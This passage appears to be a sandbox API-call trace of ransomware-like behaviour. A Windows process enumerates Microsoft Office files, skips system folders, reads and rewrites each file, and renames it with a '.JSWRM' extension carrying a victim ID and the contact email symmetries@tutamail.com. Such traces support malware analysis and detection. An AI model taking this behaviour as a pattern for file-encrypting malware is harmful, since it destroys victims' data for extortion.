returned 0x238 [0112.277] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16216) returned 1 [0112.277] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3f50) returned 0x24c1d0 [0112.277] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3f50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3f50, lpOverlapped=0x0) returned 1 [0112.283] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.283] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3f50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3f50, lpOverlapped=0x0) returned 1 [0112.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.285] CloseHandle (hObject=0x238) returned 1 [0112.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0112.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0112.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0112.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0112.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0112.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0112.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.285] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\accessmuiset.msi.16_accessmuiset.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\accessmuiset.msi.16_accessmuiset.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\accessmuiset.msi.16_accessmuiset.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\accessmuiset.msi.16_accessmuiset.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0112.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0112.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0112.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0112.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.286] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x97efe5f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x97efe5f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9862502, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6e134, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="branding.mcxml", cAlternateFileName="BRANDI~1.MCX")) returned 1 [0112.287] lstrcmpiW (lpString1="branding.mcxml", lpString2=".") returned 1 [0112.287] lstrcmpiW (lpString1="branding.mcxml", lpString2="..") returned 1 [0112.287] lstrcmpiW (lpString1="branding.mcxml", lpString2="...") returned 1 [0112.287] lstrcmpiW (lpString1="branding.mcxml", lpString2="windows") returned -1 [0112.287] lstrcmpiW (lpString1="branding.mcxml", lpString2="recovery") returned -1 [0112.287] lstrcmpiW (lpString1="branding.mcxml", lpString2="perflogs") returned -1 [0112.287] lstrcmpiW (lpString1="branding.mcxml", lpString2="documents and settings") returned -1 [0112.287] lstrcmpiW (lpString1="branding.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.287] lstrcmpiW (lpString1="branding.mcxml", lpString2="system volume information") returned -1 [0112.287] lstrcmpiW (lpString1="branding.mcxml", lpString2="msocache") returned -1 [0112.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0112.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="branding.mcxml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0112.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="branding.mcxml", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="branding.mcxml", lpUsedDefaultChar=0x0) returned 14 [0112.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0112.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0112.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="branding.mcxml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0112.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="branding.mcxml", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="branding.mcxml", lpUsedDefaultChar=0x0) returned 14 [0112.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0112.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0112.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0112.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0112.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\branding.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\branding.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.288] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=450868) returned 1 [0112.288] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0112.289] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0112.303] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.304] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0112.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.304] CloseHandle (hObject=0x238) returned 1 [0112.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0112.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0112.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0112.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0112.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0112.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0112.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0112.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0112.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.305] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\branding.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\branding.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\branding.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\branding.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0112.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0112.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0112.306] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x92201bc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x92201bc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x97efe5f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xabb6, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="dcfmui.msi.16_dcfmui.mcxml", cAlternateFileName="DCFMUI~1.MCX")) returned 1 [0112.306] lstrcmpiW (lpString1="dcfmui.msi.16_dcfmui.mcxml", lpString2=".") returned 1 [0112.306] lstrcmpiW (lpString1="dcfmui.msi.16_dcfmui.mcxml", lpString2="..") returned 1 [0112.306] lstrcmpiW (lpString1="dcfmui.msi.16_dcfmui.mcxml", lpString2="...") returned 1 [0112.306] lstrcmpiW (lpString1="dcfmui.msi.16_dcfmui.mcxml", lpString2="windows") returned -1 [0112.306] lstrcmpiW (lpString1="dcfmui.msi.16_dcfmui.mcxml", lpString2="recovery") returned -1 [0112.306] lstrcmpiW (lpString1="dcfmui.msi.16_dcfmui.mcxml", lpString2="perflogs") returned -1 [0112.306] lstrcmpiW (lpString1="dcfmui.msi.16_dcfmui.mcxml", lpString2="documents and settings") returned -1 [0112.306] lstrcmpiW (lpString1="dcfmui.msi.16_dcfmui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.306] lstrcmpiW (lpString1="dcfmui.msi.16_dcfmui.mcxml", lpString2="system volume information") returned -1 [0112.306] lstrcmpiW (lpString1="dcfmui.msi.16_dcfmui.mcxml", lpString2="msocache") returned -1 [0112.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0112.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dcfmui.msi.16_dcfmui.mcxml", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0112.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0112.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dcfmui.msi.16_dcfmui.mcxml", cchWideChar=26, lpMultiByteStr=0x241308, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dcfmui.msi.16_dcfmui.mcxml", lpUsedDefaultChar=0x0) returned 26 [0112.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0112.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dcfmui.msi.16_dcfmui.mcxml", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0112.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0112.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dcfmui.msi.16_dcfmui.mcxml", cchWideChar=26, lpMultiByteStr=0x2412b8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dcfmui.msi.16_dcfmui.mcxml", lpUsedDefaultChar=0x0) returned 26 [0112.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0112.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0112.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0112.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\dcfmui.msi.16_dcfmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\dcfmui.msi.16_dcfmui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.307] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=43958) returned 1 [0112.307] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xabb0) returned 0x24c1d0 [0112.307] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xabb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xabb0, lpOverlapped=0x0) returned 1 [0112.312] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.312] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xabb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xabb0, lpOverlapped=0x0) returned 1 [0112.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.313] CloseHandle (hObject=0x238) returned 1 [0112.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0112.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0112.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0112.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0112.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0112.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0112.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.314] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\dcfmui.msi.16_dcfmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\dcfmui.msi.16_dcfmui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\dcfmui.msi.16_dcfmui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\dcfmui.msi.16_dcfmui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0112.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0112.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0112.314] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0112.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0112.315] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x97efe5f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x97efe5f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x981606a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19f30, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="excelmui.msi.16_excelmui.mcxml", cAlternateFileName="EXCELM~1.MCX")) returned 1 [0112.315] lstrcmpiW (lpString1="excelmui.msi.16_excelmui.mcxml", lpString2=".") returned 1 [0112.315] lstrcmpiW (lpString1="excelmui.msi.16_excelmui.mcxml", lpString2="..") returned 1 [0112.315] lstrcmpiW (lpString1="excelmui.msi.16_excelmui.mcxml", lpString2="...") returned 1 [0112.315] lstrcmpiW (lpString1="excelmui.msi.16_excelmui.mcxml", lpString2="windows") returned -1 [0112.315] lstrcmpiW (lpString1="excelmui.msi.16_excelmui.mcxml", lpString2="recovery") returned -1 [0112.315] lstrcmpiW (lpString1="excelmui.msi.16_excelmui.mcxml", lpString2="perflogs") returned -1 [0112.315] lstrcmpiW (lpString1="excelmui.msi.16_excelmui.mcxml", lpString2="documents and settings") returned 1 [0112.315] lstrcmpiW (lpString1="excelmui.msi.16_excelmui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.315] lstrcmpiW (lpString1="excelmui.msi.16_excelmui.mcxml", lpString2="system volume information") returned -1 [0112.315] lstrcmpiW (lpString1="excelmui.msi.16_excelmui.mcxml", lpString2="msocache") returned -1 [0112.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelmui.msi.16_excelmui.mcxml", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0112.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0112.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelmui.msi.16_excelmui.mcxml", cchWideChar=30, lpMultiByteStr=0x240ef8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="excelmui.msi.16_excelmui.mcxml", lpUsedDefaultChar=0x0) returned 30 [0112.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelmui.msi.16_excelmui.mcxml", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0112.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0112.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="excelmui.msi.16_excelmui.mcxml", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="excelmui.msi.16_excelmui.mcxml", lpUsedDefaultChar=0x0) returned 30 [0112.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0112.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0112.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0112.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\excelmui.msi.16_excelmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\excelmui.msi.16_excelmui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.316] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=106288) returned 1 [0112.316] SetFilePointer (in: 